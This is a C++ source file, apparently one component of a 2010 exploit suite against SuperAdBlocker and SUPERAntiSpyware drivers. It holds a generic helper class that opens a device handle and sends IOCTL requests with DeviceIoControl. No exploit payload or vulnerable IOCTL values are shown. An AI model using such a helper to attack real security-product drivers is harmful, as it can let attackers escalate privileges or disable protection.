/*
* Copyright (c) 2010 by <milkovic.luka@gmail.com>
*
* SuperAdBlocker <= v4.6.1000 and SUPERAntiSpyware <= 4.34.1000 exploit suite
* --- by AelTHeGriN <aelthegrin@gmail.com> --- (Mar 2010)
*
*/

#include "StdAfx.h"
#include "IDriverConnector.h"

IDriverConnector::IDriverConnector(const TCharString &deviceName)
	: m_deviceName(deviceName), m_hDevice(NULL), m_isDeviceOpened(false)
{
	// intentionally left empty for now
}

IDriverConnector::~IDriverConnector(void)
{
	CloseDriver();
}

bool IDriverConnector::OpenDriver(void)
{
	m_hDevice = CreateFile(	m_deviceName.c_str(),					// device name
							GENERIC_READ | GENERIC_WRITE,			// access mode - read and write
							FILE_SHARE_READ | FILE_SHARE_WRITE,		// share file for reading and writing
							NULL,									// use default security attributes 
							OPEN_EXISTING,							// open device if it exists, fail otherwise
							FILE_ATTRIBUTE_NORMAL,					// use normal file attributes
							NULL									// no template file
						  );
	if(m_hDevice == INVALID_HANDLE_VALUE)
	{
		m_isDeviceOpened = false;	
	}
	else
	{
		m_isDeviceOpened = true;
	}

	return m_isDeviceOpened;
}

bool IDriverConnector::SendPacket(DWORD dwIoctlCode, PVOID pInputBuffer, DWORD dwInputBufferLen, PVOID pOutputBuffer, DWORD dwOutputBufferLen)
{
	assert(m_hDevice != NULL && m_hDevice != INVALID_HANDLE_VALUE && TEXT("Cannot send IRP packet to driver -> check handle value!"));

	DWORD BytesReturned = 0;
	BOOL ret = DeviceIoControl(	m_hDevice,
								dwIoctlCode,
								pInputBuffer,
								dwInputBufferLen,
								pOutputBuffer,
								dwOutputBufferLen,
								&BytesReturned,
								NULL
							  );	

	return ((ret != 0) ? true : false);
}

void IDriverConnector::CloseDriver(void)
{
	if(m_hDevice != NULL && m_hDevice != INVALID_HANDLE_VALUE)
	{
		CloseHandle(m_hDevice);
		m_isDeviceOpened = false;
	}
}